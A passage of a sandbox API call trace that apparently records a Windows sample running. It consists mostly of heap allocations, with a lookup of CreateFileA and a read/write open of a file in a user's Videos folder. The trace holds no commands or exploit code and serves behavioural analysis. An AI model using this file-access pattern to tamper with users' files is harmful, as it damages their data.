Size=0x4) returned 0x7af3e8 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.237] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889970 [0042.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.237] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0042.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.237] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0042.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab260 [0042.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", cchWideChar=62, lpMultiByteStr=0x7ab260, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpUsedDefaultChar=0x0) returned 62 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.239] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\dqh_ruypmijj4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5bb8 [0042.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=62, lpWideCharStr=0x7d5bb8, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv") returned 62 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.241] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.243] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.243] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.244] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: 